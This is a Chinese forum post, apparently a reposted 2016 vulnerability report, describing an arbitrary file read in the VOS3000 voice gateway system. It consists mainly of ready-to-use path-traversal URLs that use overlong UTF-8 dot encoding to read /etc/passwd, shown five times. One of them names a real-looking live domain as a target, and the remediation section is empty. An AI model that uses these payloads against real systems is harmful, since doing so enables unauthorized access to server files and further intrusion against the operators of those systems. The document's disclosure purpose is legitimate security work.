HanDs
管理员

[7月漏洞公开] 某语音网关系统任意文件读取漏洞 



-,-偶遇

详细说明:

昆石网络技术有限公司VOS3000虚拟运营支撑系统



任意文件读取漏洞



众测时偶遇的。。



直接上案例吧

漏洞证明:

code 区域
**.**.**.**/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd





QQ20160413-3.png







code 区域
http://**.**.**.**/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd





QQ20160413-4.png





code 区域
http://**.**.**.**/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd





QQ20160413-5.png





code 区域
http://www.tvmk.tv/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd





QQ20160413-6.png





code 区域
**.**.**.**/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd





QQ20160413-7.png

修复方案:

-,-


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
语音 网关 系统 任意 文件 读取 漏洞
#1楼
发帖时间:2016-7-18   |   查看数:0   |   回复数:1
jjyyjjyy
天堂鸟LV23
赶紧补吧

2016-7-18 #2楼
游客组
快速回复